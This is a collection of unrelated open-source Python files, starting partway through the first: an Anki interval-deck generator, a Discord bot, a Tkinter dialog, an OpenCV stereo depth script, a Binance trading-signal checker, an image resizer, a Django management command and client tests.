filename, filename)\n# to:\n# command = 'lilypond -dresolution=200 %s -o \"%s\" \"%s.ly\"' % (command, filename, filename)\n#\n#######################################\n\ndef main(args):\n # Configure the intervals to generate. Each dictionary\n # key is the name of the interval. The first field is\n # the shorthand name, and the second field is the number\n # of Anki notes to generate for that interval.\n interval_config = {\n 'perfect octave': ('1', 2),\n 'minor second': ('b2', 2),\n 'major second': ('2', 2),\n 'minor third': ('b3', 2),\n 'major third': ('3', 2),\n 'perfect fourth': ('4', 2),\n 'tritone (augmented fourth)': ('#4', 1),\n 'tritone (diminished fifth)': ('b5', 1),\n 'perfect fifth': ('5', 2),\n 'minor sixth': ('b6', 2),\n 'major sixth': ('6', 2),\n 'minor seventh': ('b7', 2),\n 'major seventh': ('7', 2),\n }\n # Allow savvy users to ask for rerolls of specific intervals.\n # Best used in conjunction with the --index option.\n if args.config is not None:\n interval_config = {args.config[0]: (args.config[1], int(args.config[2]))}\n # Specify the deck size modifier\n # (Anki notes = count field * size modifier)\n size_modifier = 2\n if args.size == 'short':\n size_modifier = 1\n if args.size == 'long':\n size_modifier = 4\n if args.config is not None:\n size_modifier = 1\n # Specify interval directions\n directions = []\n if args.direction in ['ascending', 'both']:\n directions.append('ascending')\n if args.direction in ['descending', 'both']:\n directions.append('descending')\n # Normalize output directory\n out_dir = os.path.abspath(args.directory)\n\n ## Start Anki note generation\n data = {\n '## Index':[],\n 'Key':[],\n 'Start Note':[],\n 'End Note':[],\n 'Direction':[],\n 'Interval':[],\n 'Sheet Music':[],\n 'Start Sound':[],\n 'End Sound':[],\n 'Interval Sound':[]\n }\n index = args.index\n print(\"\\nGenerating Anki note data...\\n\")\n for interval, (shorthand, count) in interval_config.items():\n for direction in directions:\n for i in range(count*size_modifier):\n data['## Index'].append(index)\n # Generate initial basic fields\n accidentals = round(random.triangular(-7,7,0)) \n key = keys.get_key(accidentals)[0] # Pick random major key, weighted towards 'typical' keys\n start = random.choice(keys.get_notes(key)) # Pick random note from our key\n end = intervals.from_shorthand(start, shorthand, direction=='ascending')\n data['Key'].append(key)\n data['Start Note'].append(start)\n data['End Note'].append(end)\n data['Direction'].append(direction)\n data['Interval'].append(interval)\n # Generate sheet music file\n interval_bar = Bar(key)\n start_note = Note(start)\n end_note = Note(start)\n end_note.transpose(shorthand, direction=='ascending')\n if shorthand == '1':\n if direction == 'ascending':\n end_note.octave_up()\n if direction == 'descending':\n end_note.octave_down()\n interval_bar.place_notes(start_note, 2)\n interval_bar.place_notes(end_note, 2)\n sheet_base = \"interval_{0}_sheet.png\".format(index)\n sheet = os.path.join(out_dir, sheet_base)\n lilypond.to_png(lilypond.from_Bar(interval_bar), sheet)\n data['Sheet Music'].append(''.format(sheet_base))\n # Generate audio file names\n start_base = \"interval_{0}_start\".format(index)\n end_base = \"interval_{0}_end\".format(index)\n interval_base = \"interval_{0}_full\".format(index)\n data['Start Sound'].append(\"[sound:{}.mp3]\".format(start_base))\n data['End Sound'].append(\"[sound:{}.mp3]\".format(end_base))\n data['Interval Sound'].append(\"[sound:{}.mp3]\".format(interval_base))\n start_file = os.path.join(out_dir, \"{}.wav\".format(start_base))\n end_file = os.path.join(out_dir, \"{}.wav\".format(end_base))\n interval_file = os.path.join(out_dir, \"{}.wav\".format(interval_base))\n # Generate audio files, 2 seconds per note\n start_bar = Bar(key)\n start_bar.place_notes(start_note, 1)\n end_bar = Bar(key)\n end_bar.place_notes(end_note, 1)\n fluidsynth.init(args.soundfont, file=start_file)\n fluidsynth.play_Bar(start_bar, 1, bpm=120)\n fluidsynth.init(args.soundfont, file=end_file)\n fluidsynth.play_Bar(end_bar, 1, bpm=120)\n fluidsynth.init(args.soundfont, file=interval_file)\n fluidsynth.play_Bar(interval_bar, 1, bpm=60)\n # Increment Anki note index\n index += 1\n print(\"\\n\")\n ## Create text file for Anki note importing\n df = pd.DataFrame(data)\n out_file = os.path.join(out_dir, args.file)\n df.to_csv(out_file, sep=';', index=False, quotechar=\"'\")\n\n ## Final adjustments with bash tools\n # Anki requires fields to be delimited by '; ' not just ';'\n subprocess.run(['sed', '-i', 's/;/; /g', out_file], cwd=out_dir)\n # LilyPond PNG output is one whole page (835x1181px) with footer text\n # We can crop off the bottom of the page to remove the footer,\n # then use the -trim option to remove extra whitespace.\n print(\"Cropping sheet music images...\\n\")\n subprocess.run(\"for f in *.png; do mogrify -crop 835x800+0+0 $f; done\", shell=True, cwd=out_dir)\n subprocess.run(\"for f in *.png; do mogrify -trim $f; done\", shell=True, cwd=out_dir)\n # Convert the FluidSynth output .wav files to .mp3\n print(\"Converting audio files to MP3...\\n\")\n subprocess.run(\"for f in *.wav; do ffmpeg -hide_banner -loglevel warning -i $f -vn -y ${f%.wav}.mp3; done\", shell=True, cwd=out_dir)\n subprocess.run(\"rm -f *.wav\", shell=True, cwd=out_dir)\n print(\"Done! Output in the directory {}\".format(args.directory))\n\nif __name__ == \"__main__\":\n desc = (\"Generates a text file for importing interval training notes into Anki. \"\n \"Also generates the supporting image and audio files for these notes.\")\n epil = (\"Designed for use in bash. Requires prior installation of LilyPond, ffmpeg, and imagemagick.\")\n parser = argparse.ArgumentParser(description=desc, epilog=epil)\n parser.add_argument('directory', help=\"A directory to place generated files into.\")\n parser.add_argument('--file', default=\"anki-intervals.txt\",\n help=\"Name of the file containing note information to import into Anki. Default: %(default)s\")\n parser.add_argument('--direction', choices=['ascending', 'descending', 'both'], default='both',\n help=\"Specifies the direction of intervals to generate. Default: %(default)s\")\n parser.add_argument('--size', choices=['default', 'short', 'long'], default='default',\n help=\"Size of the deck to create. Modifies the number of examples per interval. Default: %(default)s\")\n parser.add_argument('--soundfont', default='/home/pwoods/static/soundfonts/GeneralUser_v1.471.sf2',\n help=\"SoundFont file used to initialize FluidSynth. Default: %(default)s\")\n parser.add_argument('--index', default=0, type=int, help=\"Choose a starting index. Don't use unless you know what you're doing.\")\n parser.add_argument('--config', default=None, nargs=3, help=\"Set configuration information. Don't use unless you know what you're doing.\")\n args = parser.parse_args()\n if not os.path.isdir(args.directory):\n sys.exit(\"The specified directory doesn't exist: {}\".format(args.directory))\n main(args)\n\n","repo_name":"philipwoods/scripts-misc","sub_path":"gen-anki-intervals.py","file_name":"gen-anki-intervals.py","file_ext":"py","file_size_in_byte":8998,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"38468566673","text":"import settings\r\nimport discord \r\nfrom discord.ext import commands\r\nimport random\r\nlogger = settings.logging.getLogger(\"bot\")\r\n\r\nclass SimpleView(discord.ui.View):\r\n \r\n foo : bool = None\r\n \r\n async def disable_all_items(self):\r\n for item in self.children:\r\n item.disabled = True\r\n await self.message.edit(view=self)\r\n \r\n async def on_timeout(self) -> None:\r\n await self.message.channel.send(\"Timedout\")\r\n await self.disable_all_items()\r\n \r\n @discord.ui.button(label=\"Hello\", \r\n style=discord.ButtonStyle.success)\r\n async def hello(self, interaction: discord.Interaction, button: discord.ui.Button):\r\n await interaction.response.send_message(\"World\")\r\n self.foo = True\r\n self.stop()\r\n \r\n @discord.ui.button(label=\"Cancel\", \r\n style=discord.ButtonStyle.red)\r\n async def cancel(self, interaction: discord.Interaction, button: discord.ui.Button):\r\n await interaction.response.send_message(\"Cancelling\")\r\n self.foo = False\r\n self.stop()\r\n\r\ndef run():\r\n intents = discord.Intents.all()\r\n bot = commands.Bot(command_prefix=\"!\", intents=intents)\r\n \r\n @bot.event\r\n async def on_ready():\r\n logger.info(f\"User: {bot.user} (ID: {bot.user.id})\")\r\n\r\n @bot.command(\r\n help=\"This is help\",\r\n description=\"This is description\",\r\n brief = \"This is brief\",\r\n enabled=True, \r\n hidden=True\r\n )\r\n async def greet(ctx):\r\n await ctx.send(f\"Hello <@{ctx.author.id}>\")\r\n @bot.command()\r\n async def rand(ctx, *options):\r\n await ctx.send(random.choice(options))\r\n \r\n @bot.command()\r\n async def button(ctx):\r\n view = SimpleView(timeout=50)\r\n # button = discord.ui.Button(label=\"Click me\")\r\n # view.add_item(button)\r\n \r\n message = await ctx.send(view=view)\r\n view.message = message\r\n \r\n await view.wait()\r\n await view.disable_all_items()\r\n \r\n if view.foo is None:\r\n logger.error(\"Timeout\")\r\n \r\n elif view.foo is True:\r\n logger.error(\"Ok\")\r\n \r\n else:\r\n logger.error(\"cancel\")\r\n\r\n bot.run(settings.DISCORD_API_SECRET, root_logger=True)\r\nif __name__ == \"__main__\":\r\n run()","repo_name":"AtticusFan/Learn_Python_Fintech","sub_path":"bot/discord_bot.py","file_name":"discord_bot.py","file_ext":"py","file_size_in_byte":2351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"34249721384","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nZetCode Tkinter tutorial\n\nIn this script, we use the grid manager\nto create a skeleton of a calculator.\n\nauthor: Jan Bodnar\nlast modified: December 2010\nwebsite: www.zetcode.com\n\"\"\"\n\nfrom Tkinter import Tk, W, E\nfrom ttk import Frame, Button, Label, Style\nfrom ttk import Entry\nfrom pdb import set_trace as debug\n\n\nclass Example(Frame):\n \n def __init__(self, parent):\n Frame.__init__(self, parent) \n \n self.parent = parent\n \n self.initUI()\n \n def initUI(self):\n \n self.parent.title(\"Please enter company name\")\n \n Style().configure(\"TButton\", padding=(0, 20, 0, 20), width=60)\n Style().configure(\"TLabel\", padding=(3, 3, 3, 3))\n Style().configure(\"TEntry\", padding=(0, 5, 0, 5))\n self.columnconfigure(0, pad=3)\n self.columnconfigure(1, pad=3)\n self.columnconfigure(2, pad=3)\n self.columnconfigure(3, pad=3)\n \n self.rowconfigure(0, pad=3)\n self.rowconfigure(1, pad=3)\n self.rowconfigure(2, pad=3)\n self.rowconfigure(3, pad=3)\n self.rowconfigure(4, pad=3)\n self.label = Label(self, text=\"Company Name\")\n self.entry = Entry(self)\n self.entry.grid(row=0, columnspan=4, sticky=W+E)\n cls = Button(self, text=\"OK\", command=self.quit)\n cls.grid(row=1, column=0)\n self.pack()\n\n\ndef ask_company(): \n root = Tk()\n app = Example(root)\n wt = root.winfo_screenwidth()\n ht = root.winfo_screenheight()\n rootsize = (516, 102)\n x = wt/2 - rootsize[0]/2\n y = ht/2 - rootsize[1]/2\n root.geometry(\"%dx%d+%d+%d\" % (rootsize + (x, y)))\n root.lift()\n root.mainloop()\n company = app.entry.get()\n app.quit()\n return(company)\n\n\nif __name__ == '__main__':\n ask_company() ","repo_name":"leetncamp/portal","sub_path":"client/ask.py","file_name":"ask.py","file_ext":"py","file_size_in_byte":1837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"19420873051","text":"\r\nclass ComponenteConexo:\r\n def __init__(self, id, lpointsc, lboundaryc, lbbc):\r\n \"\"\"\r\n Constructor\r\n :param id: cantidad de componentes detectados\r\n :param lpointsc: lista con los puntos que definen al componente c\r\n :param lboundaryc: lista con los puntos que definen el borde del componente c\r\n :param lbbc: lista con [x,y,w,h] con x,y representa el punto inicial y w el ancho y h el largo\r\n \"\"\"\r\n self._id = id\r\n self._lpointsc = lpointsc\r\n self._lboundaryc = lboundaryc\r\n self._lbbc = lbbc\r\n\r\n\r\n\r\n","repo_name":"ClaudioMallea/Procesamiento-De-Imagenes-Tarea1","sub_path":"ProcesamientoImagenes/Python/ComponenteConexo.py","file_name":"ComponenteConexo.py","file_ext":"py","file_size_in_byte":582,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73343296466","text":"# -*- coding:utf-8 -*-\r\nimport cv2\r\nimport numpy as np\r\n\r\ndef update(val = 0):\r\n\tglobal disp \r\n\tstereo.setBlockSize(cv2.getTrackbarPos('window_size','disparity'))\r\n\tstereo.setUniquenessRatio(cv2.getTrackbarPos('uniquenessRatio','disparity'))\r\n\tstereo.setSpeckleWindowSize(cv2.getTrackbarPos('speckleWindowSize','disparity'))\r\n\tstereo.setSpeckleRange(cv2.getTrackbarPos('speckleRange','disparity'))\r\n\tstereo.setDisp12MaxDiff(cv2.getTrackbarPos('disp12MaxDiff','disparity'))\r\n\r\n\tdisp = stereo.compute(imgL,imgR).astype(np.float32) / 16.0\r\n\r\nwindow_size = 8\r\nmin_disp = 16\r\nnum_disp = 192- min_disp\r\nbolckSize = window_size\r\nuniquenessRatio = 0\r\nspeckleRange = 13\r\nspeckleWindowSize = 0\r\ndisp12MaxDiff = 200\r\nP1 = 600\r\nP2 = 2400\r\n\r\ncv2.namedWindow('disparity')\r\ncv2.createTrackbar('speckleRange','disparity',speckleRange,50,update)\r\ncv2.createTrackbar('window_size','disparity',window_size,21,update)\r\ncv2.createTrackbar('speckleWindowSize','disparity',speckleWindowSize,200,update)\r\ncv2.createTrackbar('uniquenessRatio','disparity',uniquenessRatio,50,update)\r\ncv2.createTrackbar('disp12MaxDiff','disparity',disp12MaxDiff,250,update)\r\n\r\n\r\ncap1 = cv2.VideoCapture(0)\r\ncap2 = cv2.VideoCapture(1)\r\nsign = cap1.isOpened() and cap2.isOpened()\r\nif (sign == False):\r\n print(\"相机打开失败!\")\r\n\r\n\r\nwhile(sign):\r\n\tret1,imgL = cap1.read() #普通相机读取视频帧\r\n\tret2,imgR = cap2.read()\t #红外相机读取视频帧\t\r\n\tif not (ret1 and ret2):\r\n\t\tbreak\r\n\t\r\n\t# imgL = cv2.cvtColor(imgL, cv2.COLOR_BGR2GRAY)\r\n\r\n\tstereo = cv2.StereoSGBM_create(\r\n\t\tminDisparity = min_disp,\r\n\t\tnumDisparities = num_disp,\r\n\t\tblockSize = window_size,\r\n\t\tuniquenessRatio = uniquenessRatio,\r\n\t\tspeckleRange = speckleRange,\r\n\t\tspeckleWindowSize = speckleWindowSize,\r\n\t\tdisp12MaxDiff = disp12MaxDiff,\r\n\t\tP1 = P1,\r\n\t\tP2 = P2 \r\n\t)\t\r\n\tupdate()\r\n\r\n\t# cv2.imshow('normal',imgl)\r\n\tcv2.imshow('left',imgL)\r\n\tcv2.imshow('right',imgR)\r\n\tcv2.imshow('disparity',(disp - min_disp)/num_disp)\r\n\r\n\tif cv2.waitKey(15) & 0xff == ord('q'):\r\n\t\tbreak\r\n\r\ncap1.release()\r\ncap2.release()\r\ncv2.destroyAllWindows()\r\n\r\n\r\n\r\n","repo_name":"SuHaoXD/Face-Anti-spoofing-with-Binocular-Camera","sub_path":"活体检测V2/深度图V2.py","file_name":"深度图V2.py","file_ext":"py","file_size_in_byte":2079,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"48"} +{"seq_id":"28825578564","text":"import json\nimport time\n\nimport numpy\n\nfrom datetime import datetime\nfrom collections import deque\n\nimport BinanceRestLib\n\nclass TradingChecker(object):\n #TODO: use other time interval instead the fixed 1m\n init_interval = '15m'\n #TODO: replace 300 also with a parameter related to running_interval\n running_interval = '5m'\n interval_factor = 3\n\n init_limit = 100\n\n # Static parameters for volumn comparision\n record_factor = 5\n record_number = 3\n\n # Static parameter for exponential decrease function\n # set 1.2 firstly, so that the record will be reduced to 1/4 after 7.6 min.\n alpha = 1.1\n\n # Test coins\n symbol_vol = 0\n coin_vol = 0.1\n\n def __init__(self, symbol):\n # Save the symbol name\n self.symbol = symbol\n \n # Save all average values\n self.average = self.calcuAverageValue(symbol)\n # reduce the volumn average based on 5m\n self.average[5] = self.average[5]/self.interval_factor \n\n # save the trading volum based on current credit\n self.trading_vol = self.initTradingVolumn(symbol)\n\n # use average close price as the beginnng last price\n self.last_price = self.average[4]\n\n print(self.average)\n print(self.trading_vol)\n\n # Create a dict for record volumn\n self.record_vol = deque(maxlen=self.record_number)\n\n # save the current timestamp to keep 1 min cyclic\n self.last_timestamp = time.time()\n\n def initTradingVolumn(self, symbol):\n # get the current price with the init trading volumn\n price = BinanceRestLib.getCurrentPriceTicker(symbol[:-3], symbol[-3:])\n # calculate the needed trading volumn\n volumn = {}\n volumn['buy'] = self.coin_vol/price\n volumn['sell'] = self.coin_vol/price\n return volumn\n\n def calcuAverageValue(self, symbol):\n param = {}\n param['symbol'] = symbol\n param['interval'] = self.init_interval\n param['limit'] = self.init_limit\n\n result = BinanceRestLib.getService('klines', param)\n print(result)\n\n # Use numpy to transfer the data to matrix in order to simplify the further work\n R = numpy.array(result).astype(numpy.float)\n # Calculate the average value for the whole data\n # Because each sublist in result is recognized as a column in numpy matrix, therefore calculate the average value with axis 0\n Avg = numpy.mean(R,axis=0)\n \n return Avg\n\n def checkTradingChance(self):\n param = {}\n param['interval'] = self.running_interval\n param['limit'] = 1\n param['symbol'] = self.symbol\n\n result = BinanceRestLib.getService('klines', param)[0]\n print(self.symbol, \"---------------------------\")\n # print(result)\n\n # update the average values\n # in order to save the memory space, use a weighted moving averag to simulate the simple moving average, \n # so that the weight of the very beginning data can be ignored after several times of the average update\n factor =0.975\n result_float = numpy.array(result).astype(numpy.float)\n self.average = self.average*factor + result_float*(1-factor) \n # print(self.average)\n\n if self.isBuyChance(self.symbol, result_float):\n # get current price\n price = BinanceRestLib.getCurrentPrice(self.symbol[:-3], self.symbol[-3:], self.trading_vol)\n\n # check whether the current price is bigger than the last close price\n if float(price['asks_vol']) > self.last_price:\n # record the information\n file_out = open('TradingInfo.log','a')\n file_out.write(str(datetime.fromtimestamp(time.time())))\n file_out.write(\"Find buy change for: \" + self.symbol + '\\n')\n # save data with \"average | current\"\n file_out.write(\"Open Price: \" + str(self.average[1]) + \" | \" + result[1] + '\\n')\n file_out.write(\"Close Price: \" + str(self.average[4]) + \" | \" + result[4] + '\\n')\n file_out.write(\"Trading Volumn: \" + str(self.average[5]) + \" | \" + result[5] + '\\n')\n # save current price\n file_out.write(\"Current price: \" + str(price['asks_vol']) + '\\n')\n # save volumn record\n file_out.write(\"Saved Volumn: \")\n for i in range(self.record_number):\n file_out.write(\"[\" + str(self.record_vol[i][0]) + \", \" + str(self.record_vol[i][1]) + \"], \")\n file_out.write(\"\\n\")\n\n file_out.close()\n\n print(str(datetime.fromtimestamp(time.time())))\n print(\"Find buy change for: \" + self.symbol + '\\n')\n # save data with \"average | current\"\n print(\"Open Price: \" + str(self.average[1]) + \" | \" + result[1] + '\\n')\n print(\"Close Price: \" + str(self.average[4]) + \" | \" + result[4] + '\\n')\n print(\"Trading Volumn: \" + str(self.average[5]) + \" | \" + result[5] + '\\n')\n # save current price\n print(\"Current price: \" + str(price['asks_vol']) + '\\n')\n # save volumn record\n print(\"Saved Volumn\", end=\": \" )\n for item in self.record_vol:\n print(item[0], \", \", item[1], end=\" | \")\n print()\n\n self.last_price = float(price['asks_vol'])\n self.last_timestamp = time.time()\n self.simulateBuy()\n # clean the record\n self.record_vol = deque(maxlen=self.record_number)\n\n # update history price with close price in last candle whatever buy or not\n self.last_price = result_float[4]\n\n def isBuyChance(self, symbol, result):\n # The checking rule is constructed by two parts:\n # 1. the current price must be higher than the last candle data (moved out of this function)\n # 2. there must be a continually increase of the trading volumn\n # In order to implement 2, following condition should be filled:\n # 2a. if trading volumn is n times bigger than average, the timestamp and volumn will be recorded\n # 2b. the recorded trading volumn will be added together with a weight factor\n # 2c. this weight factor is reduced very fast along the time (divide 1.5^time diff)\n # 2d. trading volumn condition is satisfied, if m volumn is recorded and the weighted average of them are still n times bigger than average\n # 2e. the recorded volumn will be removed, if it times weight factor is smaller than average volumn\n\n\n if len(self.record_vol)>0:\n print(self.record_vol)\n\n # 2a: if trading volumn is n times bigger than average\n if result[5] > self.average[5]*self.record_factor:\n print(\"Before volumn check: \")\n print(self.record_vol)\n\n # save how many times is the recorded volumn and the recording timestamp\n record = [result[5]/self.average[5], time.time()]\n\n self.record_vol.append(record)\n # # check how many records are already exists. Remove the left one if the size is over defined\n # if len(self.record_vol) > self.record_number:\n # self.record_vol.popleft()\n\n # update record volumn\n for i in range(len(self.record_vol)):\n # calculate time diff in minute\n time_diff = int((time.time() - self.record_vol[i][1])/300)\n # 2b,2c: recalculate the reocred volumn (factor) with a exponential function\n #TODO: more exact definition should be done for the decrease factor\n self.record_vol[i][0] = self.record_vol[i][0]/(self.alpha**time_diff)\n\n print(\"Between volumn check: \")\n print(self.record_vol)\n\n # 2e: remove all record smaller than average (saved factor smaller than 1)\n self.record_vol = [x for x in self.record_vol if x[0]>1]\n\n print(\"After volumn check: \")\n print(self.record_vol)\n\n # 2d: compare the record average with pre-defined record factor; check whether enough record is colleected\n weighted_avg = 0\n if len(self.record_vol)>=self.record_number:\n weighted_avg = (numpy.mean(self.record_vol, axis=0)/len(self.record_vol))[0]\n \n print(\"Weigth is: \", weighted_avg)\n\n if weighted_avg > self.record_factor:\n return True\n else:\n return False\n\n return False\n\n def simulateBuy(self):\n file_out = open('TradingInfo.log','a')\n # loop until reach the target sell price\n while True:\n price = BinanceRestLib.getCurrentPrice(self.symbol[:-3], self.symbol[-3:], self.trading_vol)\n if float(price['bids_vol'])>self.last_price*1.1:\n file_out.write(\"Target Price is reached!!! \\n\")\n file_out.write(\"Simulate sell the coin with price: \" + str(price['bids_vol']) + \"\\n\")\n break\n\n # if the price is never go through the wish one\n if time.time() - self.last_timestamp > 18000:\n file_out.write(\"Price is not reached......... \\n\")\n file_out.write(\"Current price is: \" + str(price['bids_vol']) + \"\\n\")\n break\n\n # Save price\n file_out.write(str(datetime.now()))\n file_out.write(\" | \" + str(price['bids_vol']) + \"\\n\")\n time.sleep(60)\n\n file_out.close()\n\n# Save trading data for further test\ndef createSaveTestData(symbol):\n test_data_save_name = \"TestData_\" + symbol + \"_\" + datetime.now().strftime(\"%Y_%m_%d_%H_%M\") \n test_file = open(test_data_save_name, 'a')\n test_file.write(\"[\")\n return test_file\n \n# symbol_list = ['ICXETH', 'EOSETH']\n\nsymbol_list = ['ADAETH','ADXETH','AEETH','AIONETH','AMBETH','APPCETH','ARKETH','ARNETH','ASTETH',\n'BATETH','BCCETH','BCDETH','BCPTETH','BLZETH','BNBETH','BNTETH','BQXETH','BRDETH','BTGETH','BTSETH',\n'CDTETH','CHATETH','CMTETH','CNDETH','CTRETH','DASHETH','DGDETH','DLTETH','DNTETH','EDOETH','ELFETH',\n'ENGETH','ENJETH','EOSETH','ETCETH','EVXETH','FUELETH','FUNETH','GTOETH','GVTETH','GXSETH','HSRETH',\n'ICNETH','ICXETH','INSETH','IOSTETH','IOTAETH','KMDETH','KNCETH','LENDETH','LINKETH','LRCETH','LSKETH',\n'LTCETH','LUNETH','MANAETH','MCOETH','MDAETH','MODETH','MTHETH','MTLETH','NANOETH','NAVETH','NCASHETH',\n'NEBLETH','NEOETH','NULSETH','OAXETH','OMGETH','ONTETH','OSTETH','PIVXETH','POAETH','POEETH','POWRETH',\n'PPTETH','QSPETH','QTUMETH','RCNETH','RDNETH','REQETH','RLCETH','RPXETH','SALTETH','SNGLSETH','SNMETH',\n'SNTETH','STEEMETH','STORJETH','STORMETH','STRATETH','SUBETH','TNBETH','TNTETH','TRIGETH','TRXETH','VENETH',\n'VIAETH','VIBETH','VIBEETH','WABIETH','WAVESETH','WINGSETH','WTCETH','XLMETH','XMRETH','XRPETH','XVGETH',\n'XZCETH','YOYOETH','ZECETH','ZILETH','ZRXETH']\n\nprint(len(symbol_list))\n\ntestlist = {}\n\nbegin_time = time.time()\n\n\nprint(time.time())\n\nfor symbol in symbol_list:\n print(\"Creation of the object \", symbol)\n testlist[symbol] = TradingChecker(symbol)\n\nend_time = time.time()\ntime.sleep(end_time-begin_time)\n\nwhile True:\n begin_time = time.time()\n\n for test in testlist:\n testlist[test].checkTradingChance()\n\n print(\"------------------ one cycle is completed @ \",str(datetime.fromtimestamp(time.time())), \"--------------\")\n\n end_time = time.time()\n\n # calculate how much time should be waiting for\n time_diff = end_time - begin_time\n print(\"Time usage in last round:\", time_diff)\n # wait for the next candle cyclic\n time.sleep(300-time_diff)\n\n# begin_time = time.time()\n# end_time = time.time()\n\n# while True:\n# begin_time = time.time()\n# print(begin_time)\n# for i in range(100000):\n# a = 1+i\n# end_time = time.time()\n# time.sleep(2-(end_time-begin_time))\n# # time.sleep(2)\n \n# if end_time == begin_time:\n# print(\"What the fuck!\")\n# else:\n# print(round(end_time-begin_time,20))\n# print(end_time-begin_time)\n# print(end_time)\n \n","repo_name":"cibobo/Baerlauch","sub_path":"Baerlauch.py","file_name":"Baerlauch.py","file_ext":"py","file_size_in_byte":12206,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11735871373","text":"import os\nimport glob\nfrom PIL import Image\n\ndef resize_images(input_folder, output_folder_suffix=\"_resized\", size=(500, 500)):\n \"\"\"\n Resizes all images in the input_folder to the specified size and saves them in a new folder with a suffix.\n \n :param input_folder: str, the path to the folder containing the images to be resized\n :param output_folder_suffix: str, the suffix to add to the input folder name to create the output folder\n :param size: tuple, the target size for the resized images (width, height)\n \"\"\"\n # Create the output folder if it doesn't exist\n output_folder = os.path.join(os.path.dirname(input_folder), os.path.basename(input_folder) + output_folder_suffix)\n if not os.path.exists(output_folder):\n os.makedirs(output_folder)\n\n # List all image files in the input folder\n input_folder = os.path.join(input_folder, \"*\")\n image_files = glob.glob(input_folder)\n\n # Iterate through the image files\n for image_file in image_files:\n # Open the image using Pillow\n with Image.open(image_file) as img:\n # Resize the image\n resized_img = img.resize(size)\n\n # Create the output file path\n file_name = os.path.basename(image_file)\n output_file = os.path.join(output_folder, file_name)\n\n # Save the resized image\n resized_img.save(output_file)\n\nif __name__ == \"__main__\":\n input_folder = \"images-different-sizes\"\n target_size = (500, 500)\n\n resize_images(input_folder, size=target_size)\n","repo_name":"piyushon2411/resize-images-bunker","sub_path":"resizeimages.py","file_name":"resizeimages.py","file_ext":"py","file_size_in_byte":1548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"6507372096","text":"import csv\nimport os\n\nimport resultsbot\nfrom django.core.management.base import BaseCommand\nfrom elections.models import Election\n\n\nclass Command(BaseCommand):\n def handle(self, **options):\n \"\"\"\n Stores possible modgov urls stored in CSV file against the related election objects\n \"\"\"\n\n # remove existing values first as this allows us to remove bad urls from the csv file\n Election.objects.update(modgov_url=None)\n\n path = os.path.join(\n os.path.dirname(resultsbot.__file__), \"election_id_to_url.csv\"\n )\n with open(path) as f:\n csv_file = csv.reader(f)\n for line in csv_file:\n try:\n election = Election.objects.get(slug=line[0])\n election.modgov_url = line[1]\n election.save()\n except (IndexError, Election.DoesNotExist):\n continue\n","repo_name":"DemocracyClub/yournextrepresentative","sub_path":"ynr/apps/resultsbot/management/commands/store_modgov_urls.py","file_name":"store_modgov_urls.py","file_ext":"py","file_size_in_byte":931,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"48"} +{"seq_id":"675782899","text":"from unittest import mock\n\nfrom pytest_httpx import HTTPXMock\n\nfrom tpulse.sync_client import PostClient, PulseClient, UserClient, ua\n\nclient = PulseClient()\nargs = \"?appName=invest&origin=web&platform=web\"\n\nheaders = {\n \"Content-type\": \"application/json\",\n \"Accept\": \"application/json\",\n \"User-agent\": ua,\n}\n\n\ndef test_ua():\n assert type(ua) == str\n assert len(ua) > 1\n\n\ndef test_init_user():\n user = UserClient()\n assert user._client.headers[\"Content-type\"] == \"application/json\"\n assert user._client.headers[\"Accept\"] == \"application/json\"\n assert user._client.headers[\"User-agent\"] == ua\n\n\ndef test_init_post():\n post = PostClient()\n assert post._client.headers[\"Content-type\"] == \"application/json\"\n assert post._client.headers[\"Accept\"] == \"application/json\"\n assert post._client.headers[\"User-agent\"] == ua\n\n\ndef test_get_user_info(httpx_mock: HTTPXMock):\n expected = {\n \"id\": \"08efcec6\",\n \"type\": \"personal\",\n \"nickname\": \"finvestpaper\",\n \"status\": \"open\",\n \"image\": \"df91ef92\",\n \"block\": False,\n \"description\": \"description\",\n \"followersCount\": 73,\n \"followingCount\": 11,\n \"isLead\": False,\n \"serviceTags\": [],\n \"statistics\": {\n \"totalAmountRange\": {\"lower\": 1000000, \"upper\": 3000000},\n \"yearRelativeYield\": 500.00,\n \"monthOperationsCount\": 97,\n },\n \"subscriptionDomains\": None,\n \"popularHashtags\": [],\n \"donationActive\": True,\n \"isVisible\": True,\n \"baseTariffCategory\": \"unauthorized\",\n \"strategies\": [],\n }\n httpx_mock.add_response(\n method=\"GET\",\n headers=headers,\n url=f\"{UserClient.BASE_URL}profile/nickname/finvestpaper{args}\",\n json={\"status\": \"Ok\", \"payload\": expected},\n )\n actual = client.get_user_info(\"finvestpaper\")\n assert actual == expected\n\n\ndef test_get_posts_by_user_id(httpx_mock: HTTPXMock):\n expected = {\n \"nextCursor\": 171318,\n \"hasNext\": False,\n \"items\": [\n {},\n ],\n }\n httpx_mock.add_response(\n method=\"GET\",\n headers=headers,\n url=f\"{UserClient.BASE_URL}post/instrument/AAPL{args}&limit=30&cursor=999999999\",\n json={\"status\": \"Ok\", \"payload\": expected},\n )\n actual = client.get_posts_by_ticker(\"AAPL\")\n assert actual == expected\n\n\ndef test_get_posts_by_ticker(httpx_mock: HTTPXMock):\n expected = {\n \"nextCursor\": 4757390,\n \"hasNext\": True,\n \"items\": [],\n }\n httpx_mock.add_response(\n method=\"GET\",\n headers=headers,\n url=f\"{UserClient.BASE_URL}profile/08efcec6/post{args}&limit=30&cursor=999999999\",\n json={\"status\": \"Ok\", \"payload\": expected},\n )\n actual = client.get_posts_by_user_id(\"08efcec6\")\n assert actual == expected\n\n\n@mock.patch(\"tpulse.sync_client.UserClient\", autospec=True)\n@mock.patch(\"tpulse.sync_client.PostClient\", autospec=True)\ndef test_context_manager(mock_user, mock_post):\n with PulseClient() as cli:\n cli.test()\n mock_user.return_value.close.assert_called_once()\n 